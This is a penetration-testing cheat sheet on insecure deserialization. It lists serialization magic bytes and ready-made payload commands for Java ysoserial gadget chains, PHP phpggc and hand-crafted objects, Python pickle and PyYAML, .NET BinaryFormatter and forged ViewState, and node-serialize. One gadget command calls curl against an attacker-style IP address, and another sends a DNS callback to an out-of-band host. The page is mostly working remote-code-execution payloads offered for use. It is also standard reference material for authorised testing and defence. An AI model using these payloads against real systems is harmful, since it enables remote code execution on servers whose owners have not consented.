web-pentest
Insecure Deserialization
Insecure deserialization across languages — stream fingerprinting, Java ysoserial gadget chains, PHP phpggc + manual objects, Python pickle/PyYAML, .NET ysoserial.net (ViewState/BinaryFormatter), Ruby Marshal and Node node-serialize.
Detection & Magic Bytes (5)
rO0AB... (base64) / AC ED 00 05 (hex)
Java serialized object signature
O:4:"User":1:{...} / a:2:{...}
PHP serialized object / array
\x80\x04 ... (opcode)
Python pickle stream
AAEAAAD///// (base64)
.NET BinaryFormatter stream
\x04\x08 ...
Ruby Marshal data
Java — ysoserial (4)
java -jar ysoserial.jar URLDNS http://YOURID.oast.fun
Detect deserialization with a dependency-free DNS callback
java -jar ysoserial.jar CommonsCollections1 'id' | base64 -w0
Generate a CommonsCollections RCE gadget
java -jar ysoserial.jar CommonsBeanutils1 'curl 10.10.14.1' | base64 -w0
BeanUtils gadget (common on Jenkins / Spring apps)
java -jar ysoserial.jar Spring1 'id' | base64 -w0
Spring gadget chain
PHP — phpggc & Manual (5)
phpggc -l
List every available PHP gadget chain
phpggc Laravel/RCE1 system id
Generate a Laravel RCE gadget chain
phpggc Monolog/RCE1 system id -b
Monolog gadget, base64 output
O:8:"Example":1:{s:3:"cmd";s:2:"id";}
Hand-craft an object to hit a __wakeup/__destruct gadget
phar://uploaded.phar/x
Trigger object instantiation via the phar:// wrapper
Python — pickle / PyYAML (3)
python3 -c 'import pickle,base64,os;print(base64.b64encode(pickle.dumps(type("x",(),{"__reduce__":lambda s:(os.system,("id",))})())).decode())'
Build a base64 pickle RCE payload via __reduce__
!!python/object/apply:os.system ["id"]
PyYAML RCE via unsafe load / full_load
!!python/object/apply:subprocess.check_output [["id"]]
PyYAML RCE that returns command output
.NET — ysoserial.net (3)
ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c "calc.exe" -o base64
Generate a BinaryFormatter RCE payload
ysoserial.exe -p ViewState -g TextFormattingRunProperties --generator=GEN --validationkey=KEY --validationalg=SHA1 -c "whoami"
Forge a malicious ASP.NET ViewState (leaked machineKey)
Json.NET with $type when TypeNameHandling != None
Abuse polymorphic type handling in Json.NET
Ruby / Node (2)
Marshal.load(payload) — universal Ruby gadget
Ruby 2.x–3.x universal deserialization RCE gadget
{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('id')}()"}
node-serialize RCE via an IIFE function
Related Articles
5
Web Hacking
JSON and YAML Unsafe Deserialization
Deep technical analysis of insecure deserialization across Java, PHP, Python, and Node.js …
Web Hacking
Supply Chain Attacks
Deep technical guide to software supply chain attacks — dependency confusion, malicious np…
Web Hacking
Cross-Site Scripting Mastery
Complete XSS guide covering all attack types, filter bypasses, CSP evasion, cookie stealin…
Web Hacking
File Upload to RCE
Complete file upload exploitation guide — MIME bypass, double extension tricks, polyglot J…
Web Hacking
Advanced SSRF
Complete SSRF exploitation guide — AWS IMDSv1/v2 credential theft, GCP/Azure metadata, bli…
